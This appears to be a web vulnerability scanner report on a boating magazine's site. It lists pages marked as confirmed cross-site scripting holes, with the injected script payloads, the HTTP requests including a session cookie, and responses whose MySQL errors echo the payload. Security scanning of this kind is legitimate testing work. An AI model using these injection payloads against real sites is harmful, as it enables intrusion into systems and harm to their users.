href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_site_map"><!--
Type of page: category<br />Section: 18, s_uncategorized<br />Category: 105, c_uncategorized<br />Menu: 109, m_site_map-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class=&q..
- /resources

/resources CONFIRMED

http://www.soundingsonline.com/resources?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00248..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002486)</script>

Request

GET /resources?'"--></style></script><script>netsparker(0x002486)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002486)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002486)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/resources" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Find Boating Resources for Training, Navigation, Boating Associations and Clubs</title> <link href="/resources?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/resources?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_resources"><!--
Type of page: category<br />Section: 14, s_uncategorized<br />Category: 104, c_uncategorized<br />Menu: 114, m_resources-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S&quo..
- /news/todays-top-stories/275992-medals-awarded-for-rescue-of-sailors

/news/todays-top-stories/275992-medals-awarded-for-rescue-of-sailors CONFIRMED

http://www.soundingsonline.com/news/todays-top-stories/275992-medals-awarded-for-rescue-of-sailors?'..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002488)</script>

Request

GET /news/todays-top-stories/275992-medals-awarded-for-rescue-of-sailors?'"--></style></script><script>netsparker(0x002488)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002488)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002488)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/todays-top-stories/275992-medals-awarded-for-rescue-of-sailors" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="title" content="Medals awarded for rescue of sailors" /> <meta name="author" content="Mike Trocchi" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Medals awarded for rescue of sailors</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
